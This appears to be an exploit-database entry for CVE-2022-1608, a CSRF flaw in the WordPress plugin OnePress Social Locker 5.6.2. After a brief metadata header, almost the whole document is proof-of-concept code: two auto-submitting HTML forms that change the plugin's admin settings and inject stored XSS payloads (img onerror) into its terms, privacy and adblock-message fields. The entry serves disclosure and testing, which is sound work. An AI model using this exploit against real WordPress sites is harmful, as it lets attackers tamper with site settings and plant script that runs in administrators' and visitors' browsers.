CVE: CVE-2022-1608

Name: OnePress Social Locker (social-locker)

Version: 5.6.2

Date: 2022-04-15 19:16:14

Advisory: https://wpscan.com/vulnerability/56d2d55b-bd09-47af-988c-7f47eec4151f

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=terms" method="POST">
    <input type="text" name="terms_enabled_is_active" value="1">
    <input type="text" name="opanda_terms_enabled" value="1">
    <input type="text" name="privacy_enabled_is_active" value="1">
    <input type="text" name="opanda_privacy_enabled" value="1">
    <input type="text" name="terms_use_pages_is_active" value="1">
    <input type="text" name="terms_of_use_text_is_active" value="1">
    <textarea name="opanda_terms_of_use_text"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="privacy_policy_text_is_active" value="1">
    <textarea name="opanda_privacy_policy_text"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="terms_of_use_page_is_active" value="1">
    <input type="text" name="opanda_terms_of_use_page" value="80">
    <input type="text" name="privacy_policy_page_is_active" value="1">
    <input type="text" name="opanda_privacy_policy_page" value="80">
    <input type="text" name="save-action" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>

<form action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=lock" method="POST">
    <input type="text" name="debug_is_active" value="1">
    <input type="text" name="passcode_is_active" value="1">
    <input type="text" name="opanda_passcode" value="1234">
    <input type="text" name="permanent_passcode_is_active" value="1">
    <input type="text" name="interrelation_is_active" value="1">
    <input type="text" name="in_app_browsers_is_active" value="1">
    <input type="text" name="opanda_in_app_browsers" value="visible_with_warning">
    <input type="text" name="in_app_browsers_warning_is_active" value="1">
    <input type="text" name="opanda_in_app_browsers_warning" value="You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.">
    <input type="text" name="adblock_is_active" value="1">
    <input type="text" name="opanda_adblock" value="show_error">
    <input type="text" name="adblock_error_is_active" value="1">
    <textarea name="opanda_adblock_error"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="rss_is_active" value="1">
    <input type="text" name="actual_urls_is_active" value="1">
    <input type="text" name="session_duration_is_active" value="1">
    <input type="text" name="opanda_session_duration" value="900">
    <input type="text" name="session_freezing_is_active" value="1">
    <input type="text" name="normalize_markup_is_active" value="1">
    <input type="text" name="dynamic_theme_is_active" value="1">
    <input type="text" name="managed_hook_is_active" value="1">
    <input type="text" name="opanda_managed_hook" value="">
    <input type="text" name="alt_overlap_mode_is_active" value="1">
    <input type="text" name="opanda_alt_overlap_mode" value="transparence">
    <input type="text" name="content_visibility_is_active" value="1">
    <input type="text" name="opanda_content_visibility" value="auto">
    <input type="text" name="tumbler_is_active" value="1">
    <input type="text" name="timeout_is_active" value="1">
    <input type="text" name="opanda_timeout" value="20000">
    <input type="text" name="save-action" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>